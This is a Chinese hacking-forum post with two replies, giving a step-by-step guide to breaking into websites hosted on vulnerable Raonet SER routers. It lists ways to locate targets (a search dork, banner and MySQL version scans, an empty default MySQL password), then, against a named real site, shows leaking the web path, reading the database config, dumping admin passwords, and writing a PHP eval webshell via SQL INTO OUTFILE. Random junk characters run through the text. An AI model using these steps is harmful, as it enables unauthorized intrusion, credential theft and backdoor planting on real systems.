中国网络渗透测试联盟

标题: 利用某路由器漏洞入侵国外站点 [打印本页]

作者: admin    时间: 2012-12-10 10:30
标题: 利用某路由器漏洞入侵国外站点
  寻找存在漏洞的路由器方法:
' U. P: T- n# N' ?/ `2 L8 Z' q5 U# G- h0 Z6 i
1:google搜索'Raonet Subscriber Ethernet Router'
  }7 D: C- K  h; E
9 d2 p( D. Q% q8 a2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20018 j# @. G8 I$ [/ X5 y

. i8 }; r3 e3 ]6 ]$ T/ K- A6 V3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。/ u( O* \! b+ ?9 q
8 x% v. G0 L* Q( b+ D9 k3 Z( U' G
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
8 |( ~/ F# }7 ~# M7 G# J+ l- {
( k! S9 r8 P0 l" S
3 I2 B8 z, S# x$ R' T2 r2 \
1 w( n" j9 Z! c" P+ B' d入侵步骤:
( ~9 O2 f. @5 i" _9 ^# |1 O5 ?! ~/ D) d' Y% B- K
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
  I. j) A  \* [) l" v$ ^9 d/ ]8 h# T" V6 ~5 l% k. n
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
) ~; ~( s+ O+ ~* k1 h9 {. r3:得到密码后连接,查看GUI管理密码:, M& T3 t" D( K+ {$ J6 [! ~
use ser_500
% q8 y8 A3 p% L$ @) L! [( u0 bselect id,passwd from user;
' y( d; q. l; p* l4:通过数据库写入webshell,执行命令:
# e9 M  ], P2 b! i1 }  ouse mysql;
+ D6 b# e  C4 h3 g8 O2 c' ocreate table ok(cmd TEXT);  \# u4 |  o; |' F
insert into ok values("<?php @eval($_POST[cmd])?>");
. @1 r+ I' U/ H$ L" Y$ ^& `select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";( s% s# \: k9 ]4 v5 u( K% \8 ~
drop table ok;7 g( p2 g7 x8 R0 F
2 }% q# a% ?% y& f
5:连接后门shell.php
6 T  F0 y7 j1 `
/ y* B1 J9 x( q6. 搞定!
& ]5 x8 b! o5 C
0 r0 c: q% z. {2 G: ~- _, j: G8 H! E
作者: Anthony~    时间: 2013-7-27 20:06
这个后果可以很严重的说
作者: jos666    时间: 2013-7-29 12:07
不错哦,黑服务器补洞。。




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2